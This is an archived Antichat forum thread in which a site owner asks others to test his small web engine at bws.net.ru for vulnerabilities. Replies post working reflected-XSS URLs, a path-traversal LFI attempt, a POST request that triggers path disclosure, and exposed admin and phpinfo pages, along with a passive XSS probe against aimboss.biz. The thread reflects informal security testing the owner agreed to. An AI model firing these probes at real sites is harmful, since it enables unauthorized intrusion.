bws.net.ru [Архив] - Форум АНТИЧАТ

Просмотр полной версии : bws.net.ru

DECIDE

03.07.2009, 15:40

Разработал специальный мини движок для мини комерческих сайтов алянса с единой базой пользователей и платёжной системой на всех сайтах.

нужно проверить на уязвимости

Adm1n4eG

04.07.2009, 10:59

http://bws.net.ru/?nvg=office::services"><script>alert()</script>
http://bws.net.ru/?nvg=invest:service"><script>alert()</script>
http://bws.net.ru/?nvg=crline:application"><script>alert()</script>

DECIDE

05.07.2009, 21:21

спасибо, будет исправлено

Alexandr II

06.07.2009, 06:30

http://www.bws.net.ru/?nvg=office:payment"><script>alert()</script>
их тут куча) + смотри
http://www.bws.net.ru/?nvg="><script>alert()</script>
админка вылазиет))) с какого боку?))

DECIDE

06.07.2009, 08:51

их там не куча, а просто навигация одним файлом управляется, в нём подправить и всё
ЗЫ. ща исправлю, вчера на дачу ездил устал..

Tigger

31.12.2009, 17:40

http://bws.net.ru/?com=../../../../../../../../../../../../../subscription../../../../../home/decide/domains/bws.net.ru/public_html/index

Я ваще не понял, что у тя там за проверка. Факт в том, что LFI не удался. Скажи, что за проверка, че за нах о_0 :-d

Tigger

31.12.2009, 17:45

POST http://bws.net.ru/?com=subscription&cmd=add HTTP/1.0
Host: bws.net.ru
UserAgent: Opera/9.60 (Windows NT 5.1; U; en) Presto/2.1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, */*;q=0.1
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-length: 17

eml[1]=loc@root.com

результат:
Warning: preg_match() expects parameter 2 to be string, array given in [path]

.Life

31.12.2009, 19:34

вроде все теперь крикрыл, норм теперь...
но это конешно жеть было...
http://www.bws.net.ru/?nvg="><script>alert()</script>

Belov

01.01.2010, 05:41

http://bws.net.ru/?com=%3C раскрытие путей

Byrger

05.01.2010, 16:01

<select name="nskn[]" onchange=document.getElementById('fskn').submit()><option value="original" selected>original</select>

Пути

http://bws.net.ru/?nvg[]=invest
В меню вход в админку

http://bws.net.ru/?com[]=subscription
Пути

karakurtkoss

17.03.2010, 13:13

http://bws.net.ru/?nvg=/admin
И все становится явным)

shell_c0de

17.03.2010, 17:47

http://bws.net.ru/?com=phpinfo
не дефейсните же =\

AKYLA

23.03.2010, 05:20

XSS
Пост запрос
http://bws.net.ru:80/?nvg=office:contacts
msg=12345</textarea><script>alert(12345);</script>

b82a

24.03.2010, 17:48

http://bws.net.ru/?nvg=office%27

Подставляем кавычку, получаем:
Страницы: 1, main1.htm, main2, main3, main4, main5, order-ru.txt, order.txt, partner1, partner1.htm, paym0.txt, paym1.txt, portfolio1, services1, services1.htm

life_glider

17.04.2010, 21:24

PASSIVE XSS
ПОСТ запрос http://aimboss.biz/?nvg=forum:find
в любое поле:
" <script></script> <br